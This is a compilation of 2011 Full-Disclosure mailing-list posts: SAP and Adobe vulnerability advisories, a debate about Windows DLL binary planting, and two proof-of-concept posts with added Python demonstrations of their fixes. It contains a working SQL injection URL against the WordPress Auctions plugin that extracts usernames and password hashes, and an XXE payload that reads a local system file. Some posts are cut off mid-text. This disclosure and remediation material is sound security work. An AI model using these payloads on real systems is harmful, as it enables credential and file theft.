[Full-disclosure] [Onapsis Security Advisory 2011-016] SAP WebAS Malicious SAP Shortcut Generation
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Onapsis Security Advisory 2011-016: SAP WebAS Malicious SAP Shortcut Generation

This advisory can be downloaded in PDF format from http://www.onapsis.com/.

By downloading this advisory from the Onapsis Resource Center, you will gain access to beforehand information on upcoming advisories, presentations and new research projects from the Onapsis Research Labs, as well as exclusive access to special promotions for upcoming trainings and conferences.

1. Impact on Business
=====================

By exploiting this vulnerability, an internal or external attacker would be able to perform attacks on the Organization's users through weaknesses in the SAP system. Upon a successful exploitation, he would be able to obtain sensitive information from legitimate users through social engineering attacks and/or exploit vulnerabilities in their systems in order to take control of them.

Risk Level: Medium

2. Advisory Information
=======================

- Release Date: 2011-09-14
- Last Revised: 2011-09-14
- Security Advisory ID: ONAPSIS-2011-016
- Onapsis SVS ID: ONAPSIS-00041
- Researcher: Mariano Nuñez Di Croce

3. Vulnerability Information
============================

- Vendor: SAP
- Affected Components:
  * SAP Web Application Server 7.00 Patch Number 95 (check note 1556749 for detailed information on affected releases)
- Vulnerability Class: Abuse of designed functionality / Parameter Injection
- Remotely Exploitable: Yes
- Locally Exploitable: No
- Authentication Required: No
- Original Advisory: http://www.onapsis.com/resources/get.php?resid=adv_onapsis-2011-016

4. Affected Components Description
==================================

The SAP Web Application Server provides access to many services through a Web engine, called the SAP Internet Communication Framework (ICM).

5. Vulnerability Details
========================

The SHORTCUT ICF service represents a dangerous functionality per se, as it can be executed anonymously by malicious parties to perform client-side attacks on the organization's end-users. Furthermore, this service contains a parameter injection vulnerability, which provides attackers with further control over the generation of the SAP shortcuts.

Further technical details about this issue are not disclosed at this moment with the purpose of providing enough time to affected customers to patch their systems and protect against the exploitation of the described vulnerability.

7. Report Timeline
==================

* 2011-01-25: Onapsis provides vulnerability information to SAP.
* 2011-01-25: SAP confirms reception of vulnerability submission.
* 2011-04-12: SAP releases SAP Note 1556749 fixing the vulnerability.
* 2011-09-14: Onapsis releases security advisory.

About Onapsis Research Labs
===========================

Onapsis is continuously investing resources in the research of the security of business critical systems and applications. With that objective in mind, a special unit, the Onapsis Research Labs, has been developed since the creation of the company. The experts involved in this special team lead the public research trends in this matter, having discovered and published many of the public security vulnerabilities in these platforms.

The outcome of this advanced and cutting-edge research is continuously provided to the Onapsis Consulting and Development teams, improving the quality of our solutions and enabling our customers to be protected from the latest risks to their critical business information. Furthermore, the results of these research projects are usually shared with the general security and professional community, encouraging the sharing of information and increasing the common knowledge in this field.

About Onapsis
=============

Onapsis is the leading provider of solutions for the security of ERP systems and business-critical applications. Through different innovative products and services, Onapsis helps its global customers to effectively increase the security level of their core business platforms, protecting their information and decreasing financial fraud risks.

Onapsis is built upon a team of world-renowned experts in the SAP security field, with several years of experience in the assessment and protection of critical platforms in world-wide customers, such as Fortune-100 companies and governmental entities.

Our star product, Onapsis X1, enables our customers to perform automated Security Compliance Audits, Vulnerability Assessments and Penetration Tests over their SAP platform, helping them enforce compliance requirements, decrease financial fraud risks and reduce audit costs drastically.

Some of our featured services include SAP Penetration
[Full-disclosure] [Onapsis Security Advisory 2011-014] SAP WebAS Remote Denial of Service
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Onapsis Security Advisory 2011-014: SAP WebAS Remote Denial of Service

1. Impact on Business
=====================

By exploiting this vulnerability, an unauthenticated attacker would be able to remotely disrupt the SAP Application Server. This would result in the total unavailability of the ERP functionality, preventing company users from performing the required business processes.

Risk Level: High

2. Advisory Information
=======================

- Release Date: 2011-09-14
- Last Revised: 2011-09-14
- Security Advisory ID: ONAPSIS-2011-014
- Onapsis SVS ID: ONAPSIS-00039
- Researcher: Mariano Nuñez Di Croce

3. Vulnerability Information
============================

- Vendor: SAP
- Affected Components:
  * SAP Web Application Server 7.00 Patch Number 95 (check note 1553930 for detailed information on affected releases)
- Vulnerability Class: Abuse of designed functionality
- Remotely Exploitable: Yes
- Locally Exploitable: No
- Authentication Required: Yes
- Original Advisory: http://www.onapsis.com/resources/get.php?resid=adv_onapsis-2011-014

4. Affected Components Description
==================================

The SAP Web Application Server provides access to many services through a Web engine, called the SAP Internet Communication Framework (ICM).

5. Vulnerability Details
========================

It was detected that the "cachetest" service suffers from an input validation vulnerability. This interface can be abused by a malicious attacker to put the system under continuous, high-load conditions leading to a denial of service condition.

Further technical details about this issue are not disclosed at this moment with the purpose of providing enough time to affected customers to patch their systems and protect against the exploitation of the described vulnerability.

6. Solution
===========

SAP has released SAP Note 1553930 which provides patched versions of the affected components.

The patches can be downloaded from https://service.sap.com/sap/support/notes/1553930

Onapsis strongly recommends SAP customers to download the related security fixes and apply them to the affected components in order to reduce business risks.

7. Report Timeline
==================

* 2011-01-24: Onapsis provides vulnerability information to SAP.
* 2011-01-25: SAP confirms reception of vulnerability submission.
* 2011-06-14: SAP releases SAP Note 1553930 fixing the vulnerability.
* 2011-09-14: Onapsis releases security advisory.

About Onapsis Research Labs
===========================

Onapsis is continuously investing resources in the research of the security of business critical systems and applications. With that objective in mind, a special unit, the Onapsis Research Labs, has been developed since the creation of the company. The experts involved in this special team lead the public research trends in this matter, having discovered and published many of the public security vulnerabilities in these platforms.

The outcome of this advanced and cutting-edge research is continuously provided to the Onapsis Consulting and Development teams, improving the quality of our solutions and enabling our customers to be protected from the latest risks to their critical business information. Furthermore, the results of these research projects are usually shared with the general security and professional community, encouraging the sharing of information and increasing the common knowledge in this field.

About Onapsis
=============

Onapsis is the leading provider of solutions for the security of ERP systems and business-critical applications. Through different innovative products and services, Onapsis helps its global customers to effectively increase the security level of their core business platforms, protecting their information and decreasing financial fraud risks.

Onapsis is built upon a team of world-renowned experts in the SAP security field, with several years of experience in the assessment and protection of critical platforms in world-wide customers, such as Fortune-100 companies and governmental entities.

Our star product, Onapsis X1, enables our customers to perform automated Security Compliance Audits, Vulnerability Assessments and Penetration Tests over their SAP platform, helping them enforce compliance requirements, decrease financial fraud risks and reduce audit costs drastically.

Some of our featured services include SAP Penetration Testing, SAP Gateway RFC security, SAP Enterprise Portal security assessment, Security Support for SAP Implementations and Upgrades, SAP System Hardening and SAP Technical Security Audits.

For further information about our solutions, please contact us at i...@onapsis.com and visit our website at www.onapsis.com.

Copyright (c) 2011 Onapsis SRL. All rights reserved.

This advisory may be distributed
[Full-disclosure] [Onapsis Security Advisory 2011-015] SAP WebAS webrfc Cross-Site Scripting
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Onapsis Security Advisory 2011-015: SAP WebAS webrfc Cross-Site Scripting

This advisory can be downloaded in PDF format from http://www.onapsis.com/.

By downloading this advisory from the Onapsis Resource Center, you will gain access to beforehand information on upcoming advisories, presentations and new research projects from the Onapsis Research Labs, as well as exclusive access to special promotions for upcoming trainings and conferences.

1. Impact on Business
=====================

By exploiting this vulnerability, an internal or external attacker would be able to perform attacks on the Organization's users through weaknesses in the SAP system. Upon a successful exploitation, he would be able to obtain sensitive information from legitimate users through social engineering attacks and/or exploit vulnerabilities in their systems in order to take control of them.

Risk Level: Medium

2. Advisory Information
=======================

- Release Date: 2011-09-14
- Last Revised: 2011-09-14
- Security Advisory ID: ONAPSIS-2011-015
- Onapsis SVS ID: ONAPSIS-00040
- Researcher: Mariano Nuñez Di Croce

3. Vulnerability Information
============================

- Vendor: SAP
- Affected Components:
  * SAP Web Application Server 7.00 Patch Number 95 (check note 1536640 for detailed information on affected releases)
- Vulnerability Class: Cross-Site Scripting (XSS)
- Remotely Exploitable: Yes
- Locally Exploitable: No
- Authentication Required: Yes
- Original Advisory: http://www.onapsis.com/resources/get.php?resid=adv_onapsis-2011-015

4. Affected Components Description
==================================

The SAP Web Application Server provides access to many services through a Web engine, called the SAP Internet Communication Framework (ICM).

5. Vulnerability Details
========================

It has been detected that the WEBRFC ICF service suffers from an input validation vulnerability, which can be exploited to perform XSS attacks.

Further technical details about this issue are not disclosed at this moment with the purpose of providing enough time to affected customers to patch their systems and protect against the exploitation of the described vulnerability.

6. Solution
===========

SAP has released SAP Note 1536640 which provides patched versions of the affected components.

The patches can be downloaded from https://service.sap.com/sap/support/notes/1536640

Onapsis strongly recommends SAP customers to download the related security fixes and apply them to the affected components in order to reduce business risks.

7. Report Timeline
==================

* 2011-01-25: Onapsis provides vulnerability information to SAP.
* 2011-01-25: SAP confirms reception of vulnerability submission.
* 2011-05-10: SAP releases SAP Note 1536640 fixing the vulnerability.
* 2011-09-14: Onapsis releases security advisory.

About Onapsis Research Labs
===========================

Onapsis is continuously investing resources in the research of the security of business critical systems and applications. With that objective in mind, a special unit, the Onapsis Research Labs, has been developed since the creation of the company. The experts involved in this special team lead the public research trends in this matter, having discovered and published many of the public security vulnerabilities in these platforms.

The outcome of this advanced and cutting-edge research is continuously provided to the Onapsis Consulting and Development teams, improving the quality of our solutions and enabling our customers to be protected from the latest risks to their critical business information. Furthermore, the results of these research projects are usually shared with the general security and professional community, encouraging the sharing of information and increasing the common knowledge in this field.

About Onapsis
=============

Onapsis is the leading provider of solutions for the security of ERP systems and business-critical applications. Through different innovative products and services, Onapsis helps its global customers to effectively increase the security level of their core business platforms, protecting their information and decreasing financial fraud risks.

Onapsis is built upon a team of world-renowned experts in the SAP security field, with several years of experience in the assessment and protection of critical platforms in world-wide customers, such as Fortune-100 companies and governmental entities.

Our star product, Onapsis X1, enables our customers to perform automated Security Compliance Audits, Vulnerability Assessments and Penetration Tests over their SAP platform, helping them enforce compliance requirements, decrease financial fraud risks and reduce audit costs drastically.

Some of our featured services include SAP Penetration Testing, SAP Gateway
Re: [Full-disclosure] WordPress Auctions plugin <= 1.8.8 SQL Injection
On Wed, Sep 14, 2011 at 08:12:33PM +0300, Henri Salo wrote:
> On Wed, Sep 14, 2011 at 12:04:03PM -0300, Heyder[AlligatorTeam] wrote:
> > # Exploit Title: WordPress Auctions plugin <= 1.8.8 SQL Injection Vulnerability
> > # Date: 2011-09-09
> > # Author: sherl0ck_ sherl0ck_[at]alligatorteam[dot]org @AlligatorTeam
> > # Software Link: http://downloads.wordpress.org/plugin/wp-auctions.zip
> > # Version: 1.8.8 (tested)
> >
> > --- PoC ---
> >
> > URL: http://localhost/wordpress/wp-admin/admin.php?page=wp-auctions-add&wpa_action=edit&wpa_id=-1+union+all+select+1,2,3,USER(),concat(user_login,char(58),user_pass),DATABASE(),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+wp_users&_wpnonce=e04f105b8e
> >
> > --- Vulnerable code ---
> >
> > ...
> > elseif($_GET['wpa_action'] == 'edit'):
> >     $strSQL = "SELECT * FROM ".$table_name." WHERE id=".$_GET['wpa_id'];
> > ...
> > elseif($_GET['wpa_action'] == 'relist'):
> >     $strSQL = "SELECT * FROM ".$table_name." WHERE id=".$_GET['wpa_id'];
> > ...
> > $resultList = $wpdb->get_row($strSQL);
> > ...
>
> Did you report this issue to the author of the plugin?
>
> Best regards,
> Henri Salo

Module owner replied:

"Thanks for raising this with us. The report is right in pointing out that those parameters aren't sanitised (which we will address immediately). It's worth pointing out though, that this is an administration module (protected by WordPress's user permissions); rather than one that can be accessed anonymously."

Follow-up: http://wordpress.org/support/topic/plugin-wp-auctions-wordpress-auctions-plugin?replies=3#post-2341622

Best regards,
Henri Salo

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] WordPress Auctions plugin <= 1.8.8 SQL Injection Vulnerability
On Wed, Sep 14, 2011 at 04:06:26PM -0300, Heyder[AlligatorTeam] wrote:
> # Exploit Title: WordPress Auctions plugin <= 1.8.8 SQL Injection Vulnerability
> # Date: 2011-09-09
> # Author: sherl0ck_ sherl0ck_[at]alligatorteam[dot]org @AlligatorTeam
> # Software Link: http://downloads.wordpress.org/plugin/wp-auctions.zip
> # Version: 1.8.8 (tested)
>
> --- PoC ---
>
> URL: http://localhost/wordpress/wp-admin/admin.php?page=wp-auctions-add&wpa_action=edit&wpa_id=-1+union+all+select+1,2,3,USER(),concat(user_login,char(58),user_pass),DATABASE(),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+wp_users&_wpnonce=e04f105b8e
>
> --- Vulnerable code ---
>
> ...
> elseif($_GET['wpa_action'] == 'edit'):
>     $strSQL = "SELECT * FROM ".$table_name." WHERE id=".$_GET['wpa_id'];
> ...
> elseif($_GET['wpa_action'] == 'relist'):
>     $strSQL = "SELECT * FROM ".$table_name." WHERE id=".$_GET['wpa_id'];
> ...
> $resultList = $wpdb->get_row($strSQL);
> ...

Module owner replied:

"Thanks for raising this with us. The report is right in pointing out that those parameters aren't sanitised (which we will address immediately). It's worth pointing out though, that this is an administration module (protected by WordPress's user permissions); rather than one that can be accessed anonymously."

Follow-up: http://wordpress.org/support/topic/plugin-wp-auctions-wordpress-auctions-plugin?replies=3#post-2341622

Best regards,
Henri Salo
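The injection reported in the two messages above, replayed against an in-memory SQLite database. This is an added example, not code from the advisory or from the plugin: the table layout is constructed (21 columns, because the posted UNION pads to 21 and MySQL requires the column counts to match), and MySQL's USER() and DATABASE() are replaced by string literals because SQLite has neither. The hardened lookup is the Python equivalent of what the plugin should do in PHP, i.e. coerce the id to an integer and bind it instead of concatenating it (in WordPress terms, $wpdb->prepare() with a %d placeholder). As the plugin owner notes, the page sits behind WordPress's admin permissions, so the attacker still needs an admin-level session; the example only shows what the query does once that hurdle is passed.

```python
"""Added example (not part of the Full-Disclosure posts): reproduce, against a
constructed SQLite stand-in, why the wp-auctions lookup is injectable and what
the parameterised version does with the same input."""
import sqlite3

# The posted payload pads its UNION with 21 columns, so the auctions table is
# assumed (constructed here) to have 21 columns as well.
AUCTION_COLUMNS = 21

# Payload as posted, with MySQL-only USER()/DATABASE() swapped for literals.
PAYLOAD = ("-1 union all select 1,2,3,'USER()',user_login||':'||user_pass,"
           "'DATABASE()',7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 from wp_users")


def make_db():
    """Constructed schema and rows; not real WordPress data."""
    conn = sqlite3.connect(":memory:")
    cols = ", ".join(f"c{i} TEXT" for i in range(2, AUCTION_COLUMNS + 1))
    conn.execute(f"CREATE TABLE wp_auctions (id INTEGER PRIMARY KEY, {cols})")
    conn.execute("INSERT INTO wp_auctions (id, c2) VALUES (1, 'Vintage radio')")
    conn.execute("CREATE TABLE wp_users (ID INTEGER, user_login TEXT, user_pass TEXT)")
    conn.execute("INSERT INTO wp_users VALUES (1, 'admin', '$P$Bconstructedhash')")
    return conn


def vulnerable_lookup(conn, wpa_id):
    """Mirrors the plugin: the request parameter is pasted into the SQL text."""
    sql = "SELECT * FROM wp_auctions WHERE id=" + wpa_id
    return conn.execute(sql).fetchone()


def hardened_lookup(conn, wpa_id):
    """Integer coercion plus a bound parameter: the injected text can never
    become SQL, and a non-numeric id is rejected before the query runs."""
    try:
        wpa_id = int(wpa_id)
    except ValueError:
        return None
    return conn.execute("SELECT * FROM wp_auctions WHERE id=?", (wpa_id,)).fetchone()


def demo():
    """Returns (row leaked by the vulnerable query, result of the hardened query)."""
    conn = make_db()
    return vulnerable_lookup(conn, PAYLOAD), hardened_lookup(conn, PAYLOAD)


if __name__ == "__main__":
    leaked, fixed = demo()
    print("vulnerable:", leaked[4])   # user_login:user_pass from wp_users
    print("hardened:  ", fixed)       # None: payload rejected as a non-integer
```

The leaked row is the second SELECT of the UNION: column 5 carries user_login:user_pass, exactly what the posted URL aims at. Note that the column count is the only thing the attacker has to get right; the `-1` merely guarantees the first SELECT returns nothing so the injected row comes first.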
[Full-disclosure] XEE vulnerabilities in SharePoint (MS11-074) and DotNetNuke
Hello,

Microsoft recently published MS11-074. This bulletin concerns mainly SharePoint (2007 and 2010) but CVE-2011-1892 applies too to Office Groove (client and server), Office Forms Server 2007 and Office Web Apps 2010.

The vulnerability is an XML External Entity Reference one, as described in CWE-611 [1]. The vulnerable component is XML Web Part and the following image demonstrates the exploit on a SharePoint 2007 server [2].

DotNetNuke has quietly patched this summer a very similar vulnerability in its XML component (v6.0.0 is OK [3]).

As described in Microsoft documentation [4], setting XmlReaderSettings::XmlResolver to NULL is enough to correct this bug.

Simple PoC for SharePoint and DotNetNuke:

-- XML --
<!DOCTYPE doc [ <!ENTITY boom SYSTEM "c:\\windows\\system32\\drivers\\etc\\hosts"> ]>
<doc>&boom;</doc>

-- XSL --
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
  <xsl:template match="/">
    <xsl:apply-templates/>
    <xsl:value-of select="doc"/>
  </xsl:template>
</xsl:stylesheet>

More details, in French, on my blog: http://goo.gl/hptbj

1: http://cwe.mitre.org/data/definitions/611.html
2: http://www.agarri.fr/docs/shpt-xee.png
3: http://dnnxml.codeplex.com/releases/view/62862
4: http://msdn.microsoft.com/en-us/library/ms172415.aspx

Regards,
Nicolas Grégoire / Agarri
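The PoC above, run end to end with Python's SAX parser so the effect of the fix can be seen without a SharePoint or DotNetNuke install. This is an added example, not the poster's code: the Windows hosts path is replaced by a constructed temporary file, and enabling or disabling external general entity resolution in xml.sax plays the role of a non-null versus a null XmlResolver in .NET (the mechanism is the same, the API is not). The parse with resolution on returns the file's contents as the document text; the parse with resolution off returns nothing.

```python
"""Added example (not code from the post): the same XXE payload as the PoC,
parsed with external entity resolution on (the .NET default XmlResolver) and
off (XmlResolver = null). Uses only the standard library."""
import io
import os
import tempfile
import xml.sax
from xml.sax.handler import ContentHandler, feature_external_ges


class TextCollector(ContentHandler):
    """Collects character data; a resolved external entity lands here."""

    def __init__(self):
        super().__init__()
        self.parts = []

    def characters(self, content):
        self.parts.append(content)


def parse_doc(xml_bytes, resolve_external):
    """Parse xml_bytes and return its text content. resolve_external=True
    makes the parser fetch SYSTEM entities from disk, as a vulnerable
    XmlReader does; False is the hardened configuration."""
    parser = xml.sax.make_parser()
    parser.setFeature(feature_external_ges, resolve_external)
    handler = TextCollector()
    parser.setContentHandler(handler)
    parser.parse(io.BytesIO(xml_bytes))
    return "".join(handler.parts)


def xxe_payload(target_path):
    """Same shape as the posted PoC, with the hosts path replaced by target_path."""
    return (f'<!DOCTYPE doc [ <!ENTITY boom SYSTEM "{target_path}"> ]>'
            '<doc>&boom;</doc>').encode()


def demo():
    """Returns (text leaked by the vulnerable parse, text from the hardened parse)."""
    # Constructed stand-in for the hosts file the PoC reads.
    with tempfile.NamedTemporaryFile("w", suffix=".txt", delete=False) as f:
        f.write("127.0.0.1 localhost\n")
        path = f.name
    try:
        leaked = parse_doc(xxe_payload(path), resolve_external=True)
        safe = parse_doc(xxe_payload(path), resolve_external=False)
    finally:
        os.unlink(path)
    return leaked, safe


if __name__ == "__main__":
    leaked, safe = demo()
    print("resolver on: ", repr(leaked))   # file contents appear as document text
    print("resolver off:", repr(safe))     # entity silently skipped, nothing leaks
```

The XSL half of the PoC only matters for getting the text back to the attacker (value-of on the doc element); the disclosure itself happens when the XML reader expands &boom;, which is why nulling the resolver on the reader, not on the transform, is the fix.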
Re: [Full-disclosure] Microsoft's Binary Planting Clean-Up Mission
Hi Thor,

Microsoft is maintaining a list of binary planting bugs they've fixed here:
http://technet.microsoft.com/en-us/security/advisory/2269637

You will find our name in some of these advisories.

Calling the above effort a "Binary Planting Clean-up Mission" was merely a benign poetic exercise, and this is *not* an official name of any internal mission at Microsoft to the best of my knowledge.

You can learn something about our interaction with Microsoft here:
http://blog.acrossecurity.com/2010/08/binary-planting-update-day-7.html

Cheers,
Mitja

-----Original Message-----
From: full-disclosure-boun...@lists.grok.org.uk [mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of Thor (Hammer of God)
Sent: Thursday, September 15, 2011 10:59 PM
To: secur...@acrossecurity.com; 'ChristianSciberras'
Cc: full-disclosure@lists.grok.org.uk; bugt...@securityfocus.com
Subject: Re: [Full-disclosure] Microsoft's Binary Planting Clean-Up Mission

I'm curious. Who is your contact at MSFT? Who is it that has told you they have a "Binary Planting Clean-up Mission" and where do they mention you as having anything to do with it? If you are going to claim MSFT's actions as substantive to your agenda, how about provide some details?

t

-----Original Message-----
From: ACROS Security Lists [mailto:li...@acros.si]
Sent: Thursday, September 15, 2011 1:41 PM
To: 'Christian Sciberras'
Cc: Thor (Hammer of God); full-disclosure@lists.grok.org.uk; bugt...@securityfocus.com
Subject: RE: [Full-disclosure] Microsoft's Binary Planting Clean-Up Mission

Hey Chris,

> I bet Microsoft actually like stating they just fixed yet another severe bug.
> Zero-day fixing is big business, you know, even if zero is past a few days.

I don't think Microsoft gains much from being able to say they fixed yet another bug - maybe if it were a bug they found internally and fixed proactively, but not like this. And I'm sure they'd rather be doing something else than fixing: fixing a product costs a lot, and it generates no revenue.
Cheers,
Mitja
Re: [Full-disclosure] Microsoft's Binary Planting Clean-Up Mission
Hi Adam,

I'm afraid you don't fully understand the issue. This is not about placing your own DLL on a local machine so that a chosen application will load it (i.e., user attacking an application on his own computer). It is about an application running on your computer silently grabbing a malicious DLL from an attacker-controlled location - possibly on a remote share - and executing its code (i.e., attacker with zero privileges on user's computer executing code on that computer).

I hope this helps a little.

Cheers,
Mitja

-----Original Message-----
From: iaretheb...@gmail.com [mailto:iaretheb...@gmail.com] On Behalf Of adam
Sent: Thursday, September 15, 2011 11:26 PM
To: Thor (Hammer of God)
Cc: secur...@acrossecurity.com; Christian Sciberras; full-disclosure@lists.grok.org.uk; bugt...@securityfocus.com
Subject: Re: [Full-disclosure] Microsoft's Binary Planting Clean-Up Mission

Plus: pretending that you're on the same page as Microsoft (from a security standpoint) to further your own argument is more damaging than it is beneficial. The entire binary planting concept was flawed from the very beginning. If you can drop a binary file on a user's machine - make it an executable and be done with it. There's nothing fancy or innovative about forcing applications to use specific DLLs - script kiddies have been doing it for over 10 years to inject custom code in multiplayer games.

On Thu, Sep 15, 2011 at 3:59 PM, Thor (Hammer of God) <t...@hammerofgod.com> wrote:
> I'm curious. Who is your contact at MSFT? Who is it that has told you they have a "Binary Planting Clean-up Mission" and where do they mention you as having anything to do with it? If you are going to claim MSFT's actions as substantive to your agenda, how about provide some details?
>
> t
>
> -----Original Message-----
> From: ACROS Security Lists [mailto:li...@acros.si]
> Sent: Thursday, September 15, 2011 1:41 PM
> To: 'Christian Sciberras'
> Cc: Thor (Hammer of God); full-disclosure@lists.grok.org.uk; bugt...@securityfocus.com
> Subject: RE: [Full-disclosure] Microsoft's Binary Planting Clean-Up Mission
>
> Hey Chris,
>
> > I bet Microsoft actually like stating they just fixed yet another severe bug.
> > Zero-day fixing is big business, you know, even if zero is past a few days.
>
> I don't think Microsoft gains much from being able to say they fixed yet another bug - maybe if it were a bug they found internally and fixed proactively, but not like this. And I'm sure they'd rather be doing something else than fixing: fixing a product costs a lot, and it generates no revenue.
>
> Cheers,
> Mitja
Re: [Full-disclosure] Microsoft's Binary Planting Clean-Up Mission
> I'm afraid you don't fully understand the issue. This is not about placing
> your own DLL on a local machine so that a chosen application will load it
> (i.e., user attacking an application on his own computer).

I'm not sure you understood the point. That being, whether the user knowingly or unknowingly loads the malicious DLL - the application will be affected the same either way. To that point: it's been possible for over a decade (and perhaps even longer) so pretending that it's some brand new threat that needs to be dealt with immediately is foolish.

> possibly on a remote share - and executing its code (i.e., attacker with
> zero privileges on user's computer executing code on that computer).

Zero privileges? So having write access to a share that the user accesses/loads files from - what do you call that? This is a social engineering attack - absolutely nothing more.

On a related note: have you also contacted Linus about LD_PRELOAD?

On Thu, Sep 15, 2011 at 5:05 PM, ACROS Security Lists <li...@acros.si> wrote:
> Hi Adam,
>
> I'm afraid you don't fully understand the issue. This is not about placing your own DLL on a local machine so that a chosen application will load it (i.e., user attacking an application on his own computer). It is about an application running on your computer silently grabbing a malicious DLL from an attacker-controlled location - possibly on a remote share - and executing its code (i.e., attacker with zero privileges on user's computer executing code on that computer).
>
> I hope this helps a little.
>
> Cheers,
> Mitja
>
> -----Original Message-----
> From: iaretheb...@gmail.com [mailto:iaretheb...@gmail.com] On Behalf Of adam
> Sent: Thursday, September 15, 2011 11:26 PM
> To: Thor (Hammer of God)
> Cc: secur...@acrossecurity.com; Christian Sciberras; full-disclosure@lists.grok.org.uk; bugt...@securityfocus.com
> Subject: Re: [Full-disclosure] Microsoft's Binary Planting Clean-Up Mission
>
> Plus: pretending that you're on the same page as Microsoft (from a security standpoint) to further your own argument is more damaging than it is beneficial. The entire binary planting concept was flawed from the very beginning. If you can drop a binary file on a user's machine - make it an executable and be done with it. There's nothing fancy or innovative about forcing applications to use specific DLLs - script kiddies have been doing it for over 10 years to inject custom code in multiplayer games.
>
> On Thu, Sep 15, 2011 at 3:59 PM, Thor (Hammer of God) <t...@hammerofgod.com> wrote:
> > I'm curious. Who is your contact at MSFT? Who is it that has told you they have a "Binary Planting Clean-up Mission" and where do they mention you as having anything to do with it? If you are going to claim MSFT's actions as substantive to your agenda, how about provide some details?
> >
> > t
> >
> > -----Original Message-----
> > From: ACROS Security Lists [mailto:li...@acros.si]
> > Sent: Thursday, September 15, 2011 1:41 PM
> > To: 'Christian Sciberras'
> > Cc: Thor (Hammer of God); full-disclosure@lists.grok.org.uk; bugt...@securityfocus.com
> > Subject: RE: [Full-disclosure] Microsoft's Binary Planting Clean-Up Mission
> >
> > Hey Chris,
> >
> > > I bet Microsoft actually like stating they just fixed yet another severe bug.
> > > Zero-day fixing is big business, you know, even if zero is past a few days.
> >
> > I don't think Microsoft gains much from being able to say they fixed yet another bug - maybe if it were a bug they found internally and fixed proactively, but not like this. And I'm sure they'd rather be doing something else than fixing: fixing a product costs a lot, and it generates no revenue.
> >
> > Cheers,
> > Mitja
Re: [Full-disclosure] Microsoft's Binary Planting Clean-Up Mission
Dear Mitja,

In your blog
http://blog.acrossecurity.com/2011/09/microsofts-binary-planting-clean-up.html
you wrote:

  Change #1: "No file:// Inside http://"
  Microsoft changed the behavior of Internet Explorer such that a web page (served via http://) can't display the content of a shared folder (served via file://) in a frame/iframe. This is good ...

  Change #2: "No file:// From http://"
  Not allowing a web page loaded via http:// to open a file:// URL blocks this attack vector and this is good. ...

When were those IE changes made: as part of MS11-057 maybe? I could not find any references to such a change.

Thanks, Paul

Paul Szabo   p...@maths.usyd.edu.au   http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics   University of Sydney   Australia
[Full-disclosure] FortiGuard Advisory: Adobe Reader X Sandbox Bypass Vulnerability
Adobe Reader X Sandbox Bypass Vulnerability

Sep 13, 2011

Summary:
========
Fortinet's FortiGuard Labs has discovered a sandbox bypass vulnerability in Adobe Reader X.

Impact:
=======
Local Privilege Escalation.

Risk:
=====
Critical

Affected Software:
==================
For a list of product versions affected, please see the Adobe Security Bulletin reference below.

Additional Information:
=======================
By successfully leveraging a sandbox bypass vulnerability in Adobe Reader X, malicious code could escape out of the sandbox, resulting in privilege escalation.

References:
===========
FortiGuard Advisory: http://www.fortiguard.com/advisory/FGA-2011-30.html
Adobe Security Bulletin Summary for September 13, 2011: http://www.adobe.com/support/security/bulletins/apsb11-24.html
CVE ID: CVE-2011-1353

Solutions:
==========
Users should apply the solution provided by Adobe.

Acknowledgment:
===============
Zhenhua Liu of Fortinet's FortiGuard Labs

*** Please note that this message and any attachments may contain confidential and proprietary material and information and are intended only for the use of the intended recipient(s). If you are not the intended recipient, you are hereby notified that any review, use, disclosure, dissemination, distribution or copying of this message and any attachments is strictly prohibited. If you have received this email in error, please immediately notify the sender and destroy this e-mail and any attachments and all copies, whether electronic or printed. Please also note that any views, opinions, conclusions or commitments expressed in this message are those of the individual sender and do not necessarily reflect the views of Fortinet, Inc., its affiliates, and emails are not binding on Fortinet and only a writing manually signed by Fortinet's General Counsel can be a binding commitment of Fortinet to Fortinet's customers or partners. Thank you. ***
Re: [Full-disclosure] Microsoft's Binary Planting Clean-Up Mission
I really don't want to talk more about this because everyone seems to be hating on this. However... ld_preload has to be set locally by the user or somehow remotely pass and set ld_preload environment variable. Not only that, but it has to be in the trusted path. This search path problem would be consistent with the default search path of linux, which would be (according to man ld.so/ld-linux.so and man 3 dlopen's search path): o (ELF only) If the executable file for the calling program contains a DT_RPATH tag, and does not contain a DT_RUNPATH tag, then the directories listed in the DT_RPATH tag are searched. o If the environment variable * LD_LIBRARY_PATH* is defined to contain a colon-separated list of directories, then these are searched. (As a security measure this variable is ignored for set-user-ID and set-group-ID programs.) o (ELF only) If the executable file for the calling program contains a DT_RUNPATH tag, then the directories listed in that tag are searched. o The cache file * /etc/ld.so.cache* (maintained by *ldconfighttp://linux.die.net/man/8/ldconfig (8)*) is checked to see whether it contains an entry for *filename*. o The directories */lib* and */usr/lib* are searched (in that order). Now, the issue with Microsoft is that by simply using loadlibrary* (or by using anything that follows the default search path like CreateProcess*http://msdn.microsoft.com/en-us/library/ms682425%28VS.85%29.aspx, ShellExecute*http://msdn.microsoft.com/en-us/library/bb762153%28VS.85%29.aspx, WinExec http://msdn.microsoft.com/en-us/library/ms687393%28VS.85%29.aspx, LoadModulehttp://msdn.microsoft.com/en-us/library/ms684183%28VS.85%29.aspx, _spawn*p*http://msdn.microsoft.com/en-us/library/20y988d2%28v=VS.80%29.aspxand _exec*p* http://msdn.microsoft.com/en-us/library/431x4c1w%28VS.80%29.aspx)in your code and not specifying a full path, the search path can hit a remote directory to pull and execute the file. 
From http://msdn.microsoft.com/en-us/library/ms682586%28v=vs.85%29.aspx:

Safe DLL search mode is enabled by default. If SafeDllSearchMode is enabled, the search order is as follows:

1. The directory from which the application loaded.
2. The system directory. Use the GetSystemDirectory function <http://msdn.microsoft.com/en-us/library/ms724373%28v=vs.85%29.aspx> to get the path of this directory.
3. The 16-bit system directory. There is no function that obtains the path of this directory, but it is searched.
4. The Windows directory. Use the GetWindowsDirectory function <http://msdn.microsoft.com/en-us/library/ms724454%28v=vs.85%29.aspx> to get the path of this directory.
